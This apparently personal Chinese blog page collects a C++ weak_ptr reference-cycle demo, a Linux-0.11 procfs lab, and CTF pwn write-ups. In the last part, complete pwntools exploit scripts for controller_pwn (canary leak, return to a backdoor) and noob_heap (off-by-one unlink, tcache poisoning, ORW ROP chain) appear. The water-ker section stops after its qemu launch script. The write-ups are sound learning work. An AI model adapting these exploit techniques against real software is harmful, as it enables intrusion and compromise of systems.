typedef shared_ptr<parent> parent_ptr;
typedef shared_ptr<children> children_ptr;
typedef weak_ptr<parent> parent_ptr2;

class parent{
public:
~parent() { std::cout <<"destroying parent\n"; }
public:
children_ptr children;
};

class children{
public:
~children() { std::cout <<"destroying children\n"; }
public:
parent_ptr parent;
};

void test(){
parent_ptr father(new parent());
children_ptr son(new children());

father->children = son;
son->parent = father;
cout << "father count = " << father.use_count() << endl;
cout << "son count = " << son.use_count() << endl;
}

int main(){
std::cout<<"begin test\n";
test();
std::cout<<"end test\n";
}
  • 由于 parent 和 children 对象互相引用,它们的引用计数都是 “2”,不能自动释放
  • 并且此时这两个对象再无法访问到
1
2
3
4
begin test
father count = 2
son count = 2
end test

使用弱引用 weak_ptr 即可打破循环:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#include <iostream>
#include <memory>
using namespace std;

class parent;
class children;
typedef shared_ptr<parent> parent_ptr;
typedef shared_ptr<children> children_ptr;
typedef weak_ptr<parent> parent_ptr2;

class parent{
public:
~parent() { std::cout <<"destroying parent\n"; }
public:
children_ptr children;
};

class children{
public:
~children() { std::cout <<"destroying children\n"; }
public:
parent_ptr2 parent;
};

void test(){
parent_ptr father(new parent());
children_ptr son(new children());

father->children = son;
son->parent = father;
cout << "father count = " << father.use_count() << endl;
cout << "son count = " << son.use_count() << endl;
}

int main(){
std::cout<<"begin test\n";
test();
std::cout<<"end test\n";
}
1
2
3
4
5
6
begin test
father count = 1 /* 由于children使用弱指针,因此children并不会使father的计数器增加 */
son count = 2
destroying parent
destroying children
end test

HIT-OSLab8

实验目的:

  • 掌握虚拟文件系统的实现原理
  • 实践文件、目录、文件系统等概念

实验内容:

  • 在 Linux-0.11 上实现 procfs(proc文件系统) 内的 psinfo 节点,当读取此节点的内容的时候,可得到系统当前所有进程的状态信息
  • 在 Linux-0.11 上实现 procfs(proc文件系统) 内的 hdinfo 节点,当读取此节点的内容的时候,可以打印出硬盘的一些信息
  • 参考格式如下:
1
2
3
4
5
6
7
8
9
10
11
12
# cat /proc/psinfo
pid state father counter start_time
0 1 -1 0 0
1 1 0 28 1
4 1 1 1 73
3 1 1 27 63
6 0 4 12 817

# cat /proc/hdinfo
total_blocks: 62000;
free_blocks: 39037;
used_blocks: 22963;

实验过程

procfs 是一个 Linux 内核模块,它提供了一个用于访问进程信息的文件系统

  • 通过 procfs,你可以查看与进程有关的信息,如进程 ID、进程名、进程的命令行参数等
  • 它使得用户可以方便地对进程进行管理和监控

procfs 的实现依赖于内核的 proc 文件系统,它将进程信息存储在 /proc 目录下

  • 这个目录提供了一组用于访问进程信息的文件和目录
  • 通过这些文件,你可以查看进程的详细信息,如 /proc/[pid]/cmdline 文件可以查看进程的命令行参数

在开始实验前,我们需要先了解 linux 中的两个关键结构 file 和 inode

在 Linux 中,结构体 file 用于描述一个内存中的文件(打开的文件)

1
2
3
4
5
6
7
/* Describes one open file (the in-memory state of an opened file). */
struct file {
unsigned short f_mode; /* access mode; sys_read tests bit 0 before reading from a pipe */
unsigned short f_flags; /* file flags */
unsigned short f_count; /* usage counter (presumably the number of references to this entry -- confirm) */
struct m_inode * f_inode; /* the inode this open file refers to */
off_t f_pos; /* current position within the file */
};

每种类型的文件都有一个唯一的标识符,即索引节点 inode,结构体 inode 用于描述一个在磁盘中的文件或者一个有特定功能的虚拟文件

索引节点有两种类型:

  • metadata inode 是用于存储文件元数据的 inode
    • 元数据(metadata):用来描述一个文件的特征,包含了该文件或目录的元数据,如权限、所有者、组、大小、创建时间等
  • data inode 是用于存储文件数据的 inode
    • 数据(data):泛指普通文件中的实际数据

在 linux-0.11 中似乎没有刻意去区别这两种类型的 inode:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
struct d_inode {
unsigned short i_mode;
unsigned short i_uid;
unsigned long i_size;
unsigned long i_time;
unsigned char i_gid;
unsigned char i_nlinks;
unsigned short i_zone[9];
};

/*
 * In-memory inode. The first seven fields have the same types and order as
 * struct d_inode; the remaining fields follow the
 * "these are in memory also" marker.
 */
struct m_inode {
unsigned short i_mode; /* file type and permission bits (type is extracted with S_IFMT) */
unsigned short i_uid; /* owner of the file */
unsigned long i_size; /* file size */
unsigned long i_mtime; /* time of last modification */
unsigned char i_gid; /* group of the file */
unsigned char i_nlinks; /* number of links to the file */
unsigned short i_zone[9]; /* disk zones of the file; sys_mknod stores the dev argument in i_zone[0] for block/char/proc nodes */
/* these are in memory also */
struct task_struct * i_wait; /* task associated with this inode (presumably the task waiting on it -- confirm) */
unsigned long i_atime; /* time of last access */
unsigned long i_ctime; /* change time (presumably of the inode itself, as opposed to i_mtime -- confirm) */
unsigned short i_dev; /* device number */
unsigned short i_num; /* inode number; sys_mknod writes it into the directory entry */
unsigned short i_count; /* usage counter */
unsigned char i_lock; /* lock flag */
unsigned char i_dirt; /* dirty flag; sys_mknod sets it after filling in the inode */
unsigned char i_pipe; /* pipe flag; sys_read routes to read_pipe when set */
unsigned char i_mount; /* mount flag */
unsigned char i_seek; /* NOTE(review): looks like a seek flag rather than a buffer size -- confirm against the kernel source */
unsigned char i_update; /* NOTE(review): looks like an update flag rather than a buffer size -- confirm against the kernel source */
};

首先 proc 文件系统中包含一种特殊类型的文件,需要在 include/sys/stat.h 中进行定义:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#define S_IFMT  00170000
#define S_IFREG 0100000 /* 普通文件 */
#define S_IFBLK 0060000 /* 块设备 */
#define S_IFDIR 0040000 /* 目录 */
#define S_IFCHR 0020000 /* 字符设备 */
#define S_IFIFO 0010000 /* 管道 */

#define S_ISREG(m) (((m) & S_IFMT) == S_IFREG) /* 是否为普通文件 */
#define S_ISDIR(m) (((m) & S_IFMT) == S_IFDIR) /* 是否为目录 */
#define S_ISCHR(m) (((m) & S_IFMT) == S_IFCHR) /* 是否为字符设备 */
#define S_ISBLK(m) (((m) & S_IFMT) == S_IFBLK) /* 是否为块设备 */
#define S_ISFIFO(m) (((m) & S_IFMT) == S_IFIFO) /* 是否为管道 */

#define S_IFPROC 0030000 /* proc文件 */
#define S_ISPROC(m) (((m) & S_IFMT) == S_IFPROC) /* 是否为proc文件 */

接下来我们需要在 sys_mknod sys_read 中添加有关 proc 文件的判断,使其可以支持 proc 文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
/*
 * Create a filesystem node named `filename` with the given `mode`.
 *
 * For block devices, character devices and proc files the `dev` argument
 * is stored in i_zone[0]; for proc files it is the value later handed to
 * proc_read() as its `dev` selector.
 *
 * Returns 0 on success, or:
 *   -EPERM   caller is not the super-user, or the parent directory is
 *            not writable;
 *   -ENOENT  the parent directory cannot be resolved or the final path
 *            component is empty;
 *   -EEXIST  an entry with that name already exists;
 *   -ENOSPC  no inode or no directory slot could be allocated.
 */
int sys_mknod(const char * filename, int mode, int dev)
{
const char * basename;
int namelen;
struct m_inode * dir, * inode;
struct buffer_head * bh; /* buffer returned by find_entry/add_entry for the directory block */
struct dir_entry * de; /* directory entry inside that buffer */

if (!suser())
return -EPERM;
if (!(dir = dir_namei(filename,&namelen,&basename))) /* resolve the parent directory inode */
return -ENOENT;
if (!namelen) {
iput(dir); /* hand the directory inode back (NOTE(review): iput is assumed to drop the reference, not to unlink anything -- confirm) */
return -ENOENT;
}
if (!permission(dir,MAY_WRITE)) { /* the parent directory must be writable */
iput(dir);
return -EPERM;
}
bh = find_entry(&dir,basename,namelen,&de); /* look for an existing entry with this name */
if (bh) { /* name already taken */
brelse(bh);
iput(dir);
return -EEXIST;
}
inode = new_inode(dir->i_dev); /* allocate a new inode on the directory's device */
if (!inode) {
iput(dir);
return -ENOSPC;
}
inode->i_mode = mode;
/* Device-like nodes (including proc files) keep their number in i_zone[0]. */
if(S_ISBLK(mode) || S_ISCHR(mode) || S_ISPROC(mode))
inode->i_zone[0] = dev;
inode->i_mtime = inode->i_atime = CURRENT_TIME;
inode->i_dirt = 1;
bh = add_entry(dir,basename,namelen,&de); /* add a new directory entry */
if (!bh) {
iput(dir);
/* Zero the link count before releasing the inode that never got a name. */
inode->i_nlinks=0;
iput(inode);
return -ENOSPC;
}
de->inode = inode->i_num;
bh->b_dirt = 1; /* the directory block was modified */
iput(dir);
iput(inode);
brelse(bh);
return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/*
 * read() system call: validate the descriptor, then dispatch on the kind
 * of object behind it -- pipe, proc file, character device, block device,
 * or directory/regular file.
 *
 * Returns the value produced by the selected backend, 0 when nothing is
 * requested or nothing is left, -EIO for a pipe not opened for reading,
 * and -EINVAL for a bad descriptor, a negative count or an unknown type.
 */
int sys_read(unsigned int fd,char * buf,int count)
{
	struct file *filp;
	struct m_inode *ino;
	unsigned short mode;

	if (fd >= NR_OPEN || count < 0)
		return -EINVAL;
	filp = current->filp[fd];
	if (!filp)
		return -EINVAL;
	if (count == 0)
		return 0;

	verify_area(buf,count);
	ino = filp->f_inode;

	/* Pipes are recognised by the inode flag, before looking at the mode. */
	if (ino->i_pipe) {
		if (filp->f_mode & 1)
			return read_pipe(ino,buf,count);
		return -EIO;
	}

	mode = ino->i_mode;
	if (S_ISPROC(mode)) /* proc file: i_zone[0] selects which report to read */
		return proc_read(ino->i_zone[0],&filp->f_pos,buf,count);
	if (S_ISCHR(mode)) /* character device */
		return rw_char(READ,ino->i_zone[0],buf,count,&filp->f_pos);
	if (S_ISBLK(mode)) /* block device */
		return block_read(ino->i_zone[0],&filp->f_pos,buf,count);

	if (!S_ISDIR(mode) && !S_ISREG(mode)) {
		printk("(Read)inode->i_mode=%06o\n\r",mode);
		return -EINVAL;
	}

	/* Directory or regular file: never read past the end of the file. */
	if (count+filp->f_pos > ino->i_size)
		count = ino->i_size - filp->f_pos;
	if (count<=0)
		return 0;
	return file_read(ino,filp,buf,count);
}

然后我们需要在根文件系统加载后创建 /proc 目录以及其中的 psinfo 和 hdinfo 文件:

1
2
3
4
5
6
7
8
9
setup((void *) &drive_info); /* 挂载根文件系统 */
(void) open("/dev/tty0",O_RDWR,0); /* 创建stdin */
(void) dup(0); /* 创建stdout */
(void) dup(0); /* 创建stderr */
mkdir("/proc",0755);
mknod("/proc/psinfo",S_IFPROC|0444,0);
mknod("/proc/hdinfo",S_IFPROC|0444,1);
printf("%d buffers = %d bytes buffer space\n\r",NR_BUFFERS,
NR_BUFFERS*BLOCK_SIZE);

最后的实验操作就是实现 proc_read 函数(新建 fs/proc.c 文件):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#include <linux/kernel.h>
#include <linux/sched.h>
#include <asm/segment.h>
#include <linux/fs.h>
#include <stdarg.h>
#include <unistd.h>

/*
 * Test bit `bitnr` of the bitmap starting at `addr`.
 *
 * Despite the name, nothing is written: `bt` copies the selected bit
 * into the carry flag and `setb %al` turns that flag into 0 or 1 in the
 * result register, which is pre-loaded with 0. The expression evaluates
 * to 1 when the bit is set and 0 otherwise.
 */
#define set_bit(bitnr, addr) ({ \
register int __res ; \
__asm__("bt %2,%3;setb %%al":"=a" (__res):"a" (0),"r" (bitnr),"m" (*(addr))); \
__res; })

char proc_buf[4096] = {'\0'};

extern int vsprintf(char *buf, const char *fmt, va_list args);

/*
 * Format `fmt` and its variadic arguments into `buf` by forwarding to
 * vsprintf(). Returns whatever vsprintf() returns (the number of
 * characters produced). No bound is placed on the output size, so the
 * caller must supply a large enough buffer.
 */
int sprintf(char *buf, const char *fmt, ...){
	va_list ap;
	int written;

	va_start(ap, fmt);
	written = vsprintf(buf, fmt, ap);
	va_end(ap);

	return written;
}

/*
 * Render a process table into proc_buf: one header line followed by one
 * tab-separated line (pid, state, father, counter, start_time) for every
 * non-NULL slot between FIRST_TASK and LAST_TASK.
 *
 * Returns the number of characters written (excluding the terminator).
 */
int get_psinfo() {
	struct task_struct **slot;
	char *out = proc_buf; /* write cursor inside proc_buf */

	out += sprintf(out, "%s", "pid\tstate\tfather\tcounter\tstart_time\n");

	for (slot = &FIRST_TASK; slot <= &LAST_TASK; ++slot) { /* walk every task slot */
		struct task_struct *t = *slot;

		if (t == NULL)
			continue; /* unused slot */
		out += sprintf(out, "%d\t", t->pid);
		out += sprintf(out, "%d\t", t->state);
		out += sprintf(out, "%d\t", t->father);
		out += sprintf(out, "%d\t", t->counter);
		out += sprintf(out, "%d\n", t->start_time);
	}

	return out - proc_buf;
}

/*
 * Render zone (block) and inode usage of device 0x301 into proc_buf.
 *
 * Usage is counted by testing bits of the superblock's zone and inode
 * bitmaps; each bitmap buffer covers 8192 bits, hence the `i >> 13`
 * buffer index and the `i & 8191` bit index.
 *
 * Returns the number of characters written. When no superblock is
 * available for the device, proc_buf is left empty and 0 is returned.
 */
int get_hdinfo() {
	int read = 0;
	int i, used;
	struct super_block *sb;

	sb = get_super(0x301); /* disk device number: 3*256+1 */
	if (!sb) {
		/*
		 * get_super() is assumed to return NULL when the device has no
		 * loaded superblock; publish an empty report rather than
		 * dereferencing it.
		 */
		proc_buf[0] = '\0';
		return 0;
	}

	read += sprintf(proc_buf + read, "Total blocks:%d\n", sb->s_nzones);
	used = 0;
	i = sb->s_nzones;
	while (--i >= 0) {
		if (set_bit(i & 8191, sb->s_zmap[i >> 13]->b_data))
			used++;
	}
	read += sprintf(proc_buf + read, "Used blocks:%d\n", used);
	read += sprintf(proc_buf + read, "Free blocks:%d\n", sb->s_nzones - used);

	read += sprintf(proc_buf + read, "Total inodes:%d\n", sb->s_ninodes);
	used = 0;
	/*
	 * Scan bits 1..s_ninodes only. Bit 0 does not correspond to an inode
	 * number (inode numbers start at 1 in the Minix layout Linux 0.11
	 * uses), so counting it would over-report "Used inodes" and
	 * under-report "Free inodes" by one.
	 */
	i = sb->s_ninodes + 1;
	while (--i > 0) {
		if (set_bit(i & 8191, sb->s_imap[i >> 13]->b_data))
			used++;
	}
	read += sprintf(proc_buf + read, "Used inodes:%d\n", used);
	read += sprintf(proc_buf + read, "Free inodes:%d\n", sb->s_ninodes - used);
	return read;
}

/*
 * Read from a proc file.
 *
 * dev    selects the report: 0 -> get_psinfo(), 1 -> get_hdinfo().
 * pos    in/out file position, used as an offset into proc_buf.
 * buf    user-space destination (written with put_fs_byte).
 * count  maximum number of bytes to copy.
 *
 * The report is regenerated whenever *pos is a multiple of 1024 (this
 * includes the first read at position 0). Copying stops at the string
 * terminator, at the end of proc_buf, or after `count` bytes.
 *
 * Returns the number of bytes copied; 0 signals end of file.
 */
int proc_read(int dev, unsigned long *pos, char *buf, int count){
	int i;
	unsigned long off;

	if (*pos % 1024 == 0){
		if (dev == 0)
			get_psinfo();
		if (dev == 1)
			get_hdinfo();
	}

	off = *pos;
	for (i = 0; i < count; i++){
		/* Never index past proc_buf, even if no terminator is found. */
		if (off + i >= sizeof(proc_buf) || proc_buf[off + i] == '\0')
			break;
		/*
		 * The destination is relative to the caller's buffer, not to the
		 * file position: byte i of this read goes to buf[i]. Adding *pos
		 * here would write beyond the user buffer on every read that
		 * starts at a non-zero position.
		 */
		put_fs_byte(proc_buf[off + i], buf + i);
	}
	*pos += i;
	return i;
}

最后修改 fs/makefile

1
2
3
4
5
6
7
8
9
OBJS=	open.o read_write.o inode.o file_table.o buffer.o super.o \
block_dev.o char_dev.o file_dev.o stat.o exec.o pipe.o namei.o \
bitmap.o fcntl.o ioctl.o truncate.o proc.o

......

proc.o: proc.c ../include/string.h ../include/linux/sched.h \
../include/linux/head.h ../include/linux/fs.h ../include/sys/types.h \
../include/linux/mm.h ../include/signal.h ../include/linux/kernel.h

效果如下:

controller_pwn

1
2
3
4
5
6
controller_pwn: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=b99c4c5065054620d93caef36ed671bfc30aa74b, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

简单栈溢出:

1
2
3
4
5
fflush(_bss_start);
read(0, buf, 0x30uLL);
printf("OK,get password %s:\n", buf);
fflush(_bss_start);
read(0, buf, 0x60uLL);

有后门:

1
2
3
4
/*
 * Backdoor routine found in the challenge binary (decompiler output):
 * runs the shell command "cat flag" and returns system()'s result.
 */
int flag()
{
return system("cat flag");
}

入侵思路

第一个溢出泄露 canary,第二个溢出覆盖返回地址为后门地址

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
# -*- coding:utf-8 -*-
from pwn import *

# Target selection and pwntools context.
arch = 64
challenge = './controller_pwn'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
#libc = ELF('libc-2.27.so')

# Short aliases around the tube `p` (bound below, resolved at call time).
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# Log "<name> --> <hex value>" in colour; `s` is the NAME of a variable.
# The ANSI escape needs the leading "\033" (ESC) to be recognised.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Unpack short leaks: pad with a single NUL byte (ljust requires a
# one-byte fill value) up to the integer width before unpacking.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

b = "set debug-file-directory ./.debug/\n"

# local = 1 runs the binary locally; anything else connects to the remote.
local = 1
if local:
    p = process(challenge)
    #p = gdb.debug(challenge, b)
else:
    p = remote('pwn-26afcd498d.challenge.xctf.org.cn','9999',ssl=True)

def debug():
    """Attach gdb with a breakpoint at PIE offset 0x8B8, then wait for a key."""
    #gdb.attach(p)
    gdb.attach(p,"b *$rebase(0x8B8)\n")
    pause()

def cmd(op):
    """Send menu choice `op` after the ">" prompt."""
    sla(">",str(op))

#debug()

sa("command","a"*0x28+"b")

ru("OK,get password")
ru("b")

leak_data = u64(p.recv(7).ljust(8,b"\x00"))
canary = leak_data * 0x100
success("leak_data >> "+hex(leak_data))
success("canary >> "+hex(canary))

sleep(0.5)
p.send(b"a"*0x28+p64(canary)+b"b"*0x8+p8(0xa))

p.interactive()

noob_heap

1
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.4) stable release version 2.35.
1
2
3
4
5
6
noob_heap1: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=5017d1695b20f77ecbb13c419848ac70f4edbafc, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开
1
2
3
4
5
6
7
8
9
10
11
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x01 0x00 0xc000003e if (A == ARCH_X86_64) goto 0003
0002: 0x06 0x00 0x00 0x00000000 return KILL
0003: 0x20 0x00 0x00 0x00000000 A = sys_number
0004: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0006
0005: 0x06 0x00 0x00 0x00000000 return KILL
0006: 0x15 0x00 0x01 0x00000065 if (A != ptrace) goto 0008
0007: 0x06 0x00 0x00 0x00000000 return KILL
0008: 0x15 0x00 0x01 0x0000009d if (A != prctl) goto 0010
0009: 0x06 0x00 0x00 0x00000000 return KILL
0010: 0x06 0x00 0x00 0x7fff0000 return ALLOW

漏洞分析

有 off-by-one 漏洞:

1
2
3
4
5
6
else if ( chunk_list[index] )
{
printf("Note: ");
chunk = chunk_list[index];
chunk[read(0, chunk, size_list[index])] = 0;// off-by-one
}

入侵思路

有 off-by-one 漏洞,因此需要打 unlink attack

本题目限制 chunk 大小,需要利用 scanf 中的 malloc 来触发 fast chunk 合并,得到 libc_base:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
add(0x78)
dele(0)
add(0x78)
show(0)

leak_addr = u64(p.recv(5).ljust(8,b"\x00"))*0x1000
heap_base = leak_addr
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

for i in range(32):
add(0x78)

for i in range(7):
dele(i)

for i in range(9):
dele(i+7)

cmd("1"*0x400)

for i in range(7):
add(0x78)
add(0x78)

show(7)
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
libc_base = leak_addr - 0x21a0f0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

这里需要利用 fast chunk 的合并机制,堆布局如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Free chunk (fastbins) | PREV_INUSE
Addr: 0x55722449c810 /* chunk1 */
Size: 0x81
fd: 0x5577736b8c0c

Free chunk (fastbins) | PREV_INUSE
Addr: 0x55722449c890 /* chunk2 */
Size: 0x81
fd: 0x55722449c

Allocated chunk | PREV_INUSE
Addr: 0x55722449c910 /* chunk3 */
Size: 0x81

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x55722449c990 /* chunk4 */
Size: 0x101
fd: 0x7fdeb0a19ce0
bk: 0x7fdeb0a19ce0
  • 通过 chunk3 覆盖 chunk4->size 的P位,同时在 chunk3 中伪造 fd,bk(为了通过 unlink 检查)
  • 使用 scanf 触发 fast chunk 合并:
    • 首先 chunk4 会进入 smallbin
    • 程序读取 chunk4->size 的P位为“0”,误以为 chunk3 是 fast chunk
    • 程序将 chunk1,chunk2,chunk3 这3个 fast chunk 合并

测试样例如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
for i in range(6):
add(0x78)

for i in range(7):
dele(i)

fake_heap_addr = heap_base + 0x910
payload = ""
payload += p64(fake_heap_addr+0x18)+p64(fake_heap_addr+0x20)
payload += p64(0)+p64(0)
payload += p64(fake_heap_addr)

dele(12)
dele(11)
edit(13,payload.ljust(0x70,b"\x00")+p64(0x80))
cmd("1"*0x400)

for i in range(7):
add(0x78)
add(0x78)
add(0x78)

for i in range(7):
dele(i)
dele(12)
dele(11)
cmd("1"*0x400)

由于相邻 chunk->size 的P位为“1”,需要一些堆风水才能将 chunk3 申请回来,之后就可以实现 UAF

最后劫持 tcache,先通过 environ 泄露 stack_addr,后劫持返回地址写入 ORW 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
# -*- coding:utf-8 -*-
from pwn import *

# Target selection and pwntools context.
arch = 64
challenge = './noob_heap1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

# Short aliases around the tube `p` (bound below, resolved at call time).
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# Log "<name> --> <hex value>" in colour; `s` is the NAME of a variable.
# The ANSI escape needs the leading "\033" (ESC) to be recognised.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Unpack short leaks: pad with a single NUL byte (ljust requires a
# one-byte fill value) up to the integer width before unpacking.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

b = "set debug-file-directory ./.debug/\n"

# local = 1 runs the binary locally; anything else connects to the remote.
local = 1
if local:
    p = process(challenge)
    #p = gdb.debug(challenge, b)
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach gdb with a breakpoint at PIE offset 0x1824, then wait for a key."""
    #gdb.attach(p,"")
    gdb.attach(p,"b *$rebase(0x1824)\n")
    pause()

def cmd(op):
    """Answer the ">>" menu prompt; ints are converted, anything else is sent as-is."""
    if(type(op) == int):
        sla(">>",str(op))
    else:
        sla(">>",op)

def add(size):
    """Menu option 1: allocate a note of `size` bytes."""
    cmd(1)
    sla("Size: ",str(size))

def dele(index):
    """Menu option 2: free the note at `index`."""
    cmd(2)
    sla("Index: ",str(index))

def edit(index,data):
    """Menu option 3: write `data` into the note at `index`."""
    cmd(3)
    sla("Index: ",str(index))
    sa("Note: ",data)

def show(index):
    """Menu option 4: print the note at `index`."""
    cmd(4)
    sla("Index: ",str(index))

add(0x78)
dele(0)
add(0x78)
show(0)

leak_addr = u64(p.recv(5).ljust(8,b"\x00"))*0x1000
heap_base = leak_addr
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

for i in range(32):
add(0x78)

for i in range(7):
dele(i)

for i in range(9):
dele(i+7)

cmd("1"*0x400)

for i in range(7):
add(0x78)
add(0x78)

show(7)
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
libc_base = leak_addr - 0x21a0f0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

for i in range(6):
add(0x78)

for i in range(7):
dele(i)

fake_heap_addr = heap_base + 0x910
payload = ""
payload += p64(fake_heap_addr+0x18)+p64(fake_heap_addr+0x20)
payload += p64(0)+p64(0)
payload += p64(fake_heap_addr)

dele(12)
dele(11)
edit(13,payload.ljust(0x70,b"\x00")+p64(0x80))
cmd("1"*0x400)

for i in range(7):
add(0x78)
add(0x78)
add(0x78)

for i in range(7):
dele(i)
dele(12)
dele(11)
cmd("1"*0x400)

fake_heap_addr = heap_base + 0x790
payload = ""
payload += p64(fake_heap_addr+0x18)+p64(fake_heap_addr+0x20)
payload += p64(0)+p64(0)
payload += p64(fake_heap_addr)

dele(9)
edit(10,payload.ljust(0x70,b"\x00")+p64(0x80))
cmd("1"*0x400)

for i in range(7):
add(0x78)

add(0x78)
add(0x78)
add(0x78)
add(0x78)

environ = libc_base + libc.sym['__environ']
key = (heap_base + 0x7a0) >> 12

for i in range(4):
dele(i)
dele(10)
edit(14,p64(environ ^ key))

add(0x78)
add(0x78)
show(1)
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
stack_addr = leak_addr - 0x140 - 0x8
success("leak_addr >> "+hex(leak_addr))
success("stack_addr >> "+hex(stack_addr))

pop_rdi_ret = libc_base + 0x000000000002a3e5
pop_rsi_ret = libc_base + 0x000000000002be51
pop_rdx_ret = libc_base + 0x00000000000796a2
pop_rax_ret = libc_base + 0x0000000000045eb0
open_libc = libc_base + libc.sym['open']
read_libc = libc_base + libc.sym['read']
write_libc = libc_base + libc.sym['write']

payload = "a"*0x18
payload += p64(pop_rdi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0x400)
payload += p64(read_libc)

dele(0)
edit(14,p64(stack_addr ^ key))
add(0x78)
add(0x78)

edit(4,"./flag".ljust(0x30,b"\x00"))
#debug()
edit(2,payload)

payload = b"a"*0x40
payload += p64(pop_rdi_ret) + p64(heap_base+0x3a0)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(open_libc)

payload += p64(pop_rdi_ret) + p64(3)
payload += p64(pop_rsi_ret) + p64(heap_base+0x3a0)
payload += p64(pop_rdx_ret) + p64(0x30)
payload += p64(read_libc)

payload += p64(pop_rdi_ret) + p64(1)
payload += p64(write_libc)
sleep(0.5)
sl(payload)

p.interactive()

water-ker

1
Linux version 6.4.0 (root@ubuntu-virtual-machine) (gcc (Ubuntu 9.4.0-1ubuntu1~23
1
2
3
4
5
6
7
8
9
10
11
#!/bin/sh
qemu-system-x86_64 \
-m 256M \
-kernel ./bzImage \
-initrd ./rootfs.cpio \
-monitor /dev/null \
-append "root=/dev/ram console=ttyS0 oops=panic quiet panic=1 kaslr" \
-cpu kvm64,+smep,+smap\
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \
-no-reboot
  • smep,smap,kaslr
